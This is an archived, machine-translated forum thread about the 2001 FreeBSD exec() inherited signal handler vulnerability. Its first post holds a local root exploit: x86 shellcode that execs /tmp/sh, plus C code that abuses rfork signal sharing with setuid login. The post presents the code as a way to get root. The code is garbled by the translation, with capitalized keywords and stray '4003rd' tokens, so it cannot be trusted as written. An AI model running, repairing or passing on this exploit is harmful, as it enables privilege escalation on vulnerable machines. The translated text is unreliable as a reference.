Linux -Blue forest free software | Return to home page | Site Map | Search WWW | Contact Us | -->
Your current position : Homepage > Free Software > Technological exchanges >Application Programming -->


    

Blue Forest http://www.lslnet.com at 2:08 p.m. on August 16, 2006

FreeBSD exec () overflow bug!!!

The writer : cisdi (cisdi), FreeBSD letter :
Title : Re : FreeBSD exec () InheritedSignalHandlerVulnerabil
Shuimu Tsinghua BBS letter Station : Station (Tue Jul 17 09:51:42 2001)

This very serious indeed bugs, which most days have Freebsd machine restarted the machine?
Give a hand to see
Testing procedures :
After editing cp to /tmp Catalog, can be imported root of the #


#include "Stdio.h>
#include "Signal.h>
#include "Unistd.h>
Int vv1;


# MYSIG Covault



//exec "/tmp/sh" Shellcode gotten from the internet and modified
Unsigned char bsdshell[] = "\x90\x90\x90\x90\x90\x90\x90\x90"
"\x31\xc0\x50\x50\xb0\xb7\xcd\x80"
"\x31\xc0\x50\x50\xb0\x17\xcd\x80"
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x74\x6d\x70\x89\xe3\x50\x53\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80\x90\x90\x90";
Typedef (*PROG) ();
Extern char **environ;


Int main (int ac, char **av)
{
Int pid;
4003rd (* (PROG) bsdshell) ();
If (! (Vv1=getenv ( "vv")))
{
Setenv ( "vv" bsdshell,1);
If (!execle (av[0], "vv", NULL, environ))
{
Perror ( "weird exec");
Exit (1);
}
}


Printf ( "vvfreebsd. Written by Georgi Guninski\n ");
Printf ( "shall jumps to %x\n" vv1);


If (! (Pid=rfork (RFPROC|RFSIGSHARE)))
{
Printf ( "child=%d\n", getpid ());
4003rd /usr/bin/login and rlogin work for me. Shell of ping gives nonsuid
4003rd if (!execl ( "/usr/bin/rlogin", "rlogin", "localhost", 0))
If (!execl ( "/usr/bin/login" and "Login", 0))
{
Perror ( "exec setuid failed");
Exit (2);
};
}
Sleep (2);
Signal (MYSIG (sig_t) vv1);
Sleep (2);
Kill (pid, MYSIG);
Printf ( "done\n");
While (42);
}




[In cybergene (Gene ~ ~ ~ perhaps beyond) -- the role mentioned :
FreeBSD : exec () Inherited Signal Handler Vulnerability
: Bugtraq id 3007
: Object exec () (syscall)
Design Error : 14.00
: Cve CVE-MAP-NOMATCH
No remote :
Yes : local
: Published July 10, 2001
Updated : July 16, 2001
Vulnerable FreeBSD FreeBSD 4.3 :
FreeBSD FreeBSD 4.2 :
: ...................

--

Laws : Jul 17 09:52:32 cisdi activity in this revision : 61.167.60.3] [FROM
Source : Shuimu Tsinghua BBS activity stations smth.org [FROM : 61.167.60.3]




Re : FreeBSD exec () overflow bug!!!

FreeBSD4.3?




Re : FreeBSD exec () overflow bug!!!

Read the code first, called the overflow?

Unix is a life style.

[ Closed window ]


 Privacy Policy  Copyright © 1999-2000 LSLNET.COM. All rights reserved. Blue Forest website owners. E-mail : Webmaster@lslnet.com